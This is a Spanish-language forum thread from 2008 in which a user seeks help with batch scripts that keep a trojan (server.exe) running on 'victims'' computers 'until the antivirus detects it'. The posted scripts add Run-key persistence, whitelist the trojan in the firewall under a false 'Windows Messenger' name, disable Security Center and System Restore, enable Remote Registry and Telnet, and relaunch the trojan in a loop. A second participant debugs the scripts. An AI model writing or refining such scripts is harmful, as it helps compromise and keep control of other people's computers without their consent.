Como hacer funcionar este batch perfectamente?

Iniciado por SoloAki, 7 Enero 2008, 00:53 AM

0 Miembros y 1 Visitante están viendo este tema.

SoloAki

Me surgio una duda si tengo el troyano en system32/2145/server.exe podria llamarle haciendo esto.
Citarinicio:
if exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\lsass.exe )
ping -n 120 localhost > nul
goto inicio

esto haria que llamara si existiese el server.exe ahi cada 120 segundos ? esta bien hecho el code?

Asi lo agrego al bat y le saco esta parte
:bucle
start /min system.exe
ping -n 120 localhost > nul
goto bucle

por la otra que seria mas facil y mas eficaz

Stacker

Esto llamaria a lsass.exe si existe server.exe, si lo que quieres es ejecutar el server deberia quedar así:

Citarif exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\server.exe )

Por otro lado tanto si es server.exe(server de un troyano) como lsass.exe(bucle), supongo que deberian estar siempre en ejecución por lo que al llamarlos una y otra vez acabarás bloqueando windows.

No se si te referias a eso


SoloAki

No Quiero hacer el bucle para llamar el server no quiero bloquearle la PC sino que llame a ese server silenciosamente en ejecucion. Tengo victimas con alto porcentaje de ping y cuando ejecuto denuevo el server vuelven inmediatamente :) y nose pierden y vuelven a la hora o cada 5 horas. Por eso el fin de este .bat es para eso. No perder nunca a la victima hasta que el antivirus te lo detecte :) y no perderlo por el ping o por otras causas Jeje. Espero respuesta tuya !! Nos vemos :D

Stacker

Entiendo, creo que no deberia darte problemas. :)

Además supongo que tendrás ip fija, un no-ip o un sistema que te reporte la ip de la víctima (si no se encarga el propio troyano).

SoloAki

Ok entonces esta bien si existe server.exe va a ejecutar el bucle no? Y si se reinicia la PC se inicia otra vez el .bat y se va a fijar si está y si es asi va a empezar otra vez el bucle verdad?

Stacker

Así es. Pero, no entiendo al ver otra vez el código porqué si existe server.exe se ejecuta lsass.exe cada x segundos.

SoloAki

No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.

Stacker

CitarNo.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.

OK

SoloAki

#48
Dudas aqui !!

@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
[color=red]REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d[/color] %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio


Esto %windir%system32\2114\ es la ubicacion donde se aloja el troyano una pregunta system32 tiene algun abreviado en codigo como %windir% que seria Window? se pueden poner 2 if exist en un mismo bat? uno para llamar a otro bat y otro ubicado en el bucle como ves. Otra pregunta lo rojo eso agrega el .bat al msconfig cuando se reinicia la pc vuelve a ejecutarse el bat verdad?

El otro bat que seria este..

:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [color=red]lsass[/color]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r


la parte roja ahi no tendria que ser lsass.exe ?

Ahi ta esas mis dudas espero que me puedas ayudar otra vez.. y decirme si el bat esta bien.

Stacker

Hola de nuevo.

Creo que no hay una varible de entorno para system32, %windir%\system32 es lo más corto que te asegura a la vez no equivocarte de unidad. (que puede no ser C:)




La parte en rojo está bien si lo que quieres ejecutar al inicio el ctfmon.bat.

Y por último, sí, se pueden poner cuantos if exist quieras, pero ten en cuenta:

-El primero de tu script se ejecuta una vez al inicio (lsass.exe).
-El segundo se está ejecutando constantemente cada 100 pings siempre que exista system32.exe



Espero haberte ayudado. Pero para asegurarme de mi respuesta, ¿cual era el nombre de este script? ¿ctfmon.bat? - me lo he preguntado porque crei que ibas a compilarlo. :huh:

Si no es así explicame que nombre tiene cada archivo para que pueda darte una respuesta definitiva.

Saludos